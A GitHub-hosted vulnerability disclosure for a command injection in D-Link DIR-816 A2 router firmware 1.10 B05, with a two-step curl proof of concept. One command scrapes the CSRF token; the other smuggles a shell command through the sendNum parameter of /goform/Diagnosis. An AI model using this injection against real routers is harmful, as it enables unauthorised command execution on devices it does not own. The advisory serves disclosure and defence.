Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
VulInfo/D-Link/DIR-816/cmd_injection_1/
VulInfo/D-Link/DIR-816/cmd_injection_1/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 

D-Link DIR-816 A2 Command Injection

Vender :D-Link

Firmware version:1.10 B05

Exploit Author: nabla@galaxylab.org

Vendor Homepage: http://www.dlink.com.cn/

Hardware Link:http://support.dlink.com.cn/ProductInfo.aspx?m=DIR-816

Vul detail

In the handler of route /goform/Diagnosis, the value of parameter sendNum is used in the construction of command ping -c %s ..., which is later fed to system:

So it could lead to command injection with crafted request.

POC

There's a random token required by the route, which is used as a mitigation against CSRF. So first we need to get its value:

TOKENID=`curl -s http://192.168.0.1/dir_login.asp | grep tokenid | head -1 | grep -o 'value="[0-9]*"' | cut -f 2 -d = | tr -d '"'`

Then we could send the crafted parameter along with the token to the route:

curl -i -X POST http://192.168.0.1/goform/Diagnosis -d tokenid=$TOKENID -d 'pingAddr=192.168.0.1' -d 'sendNum=3;touch /tmp/test;'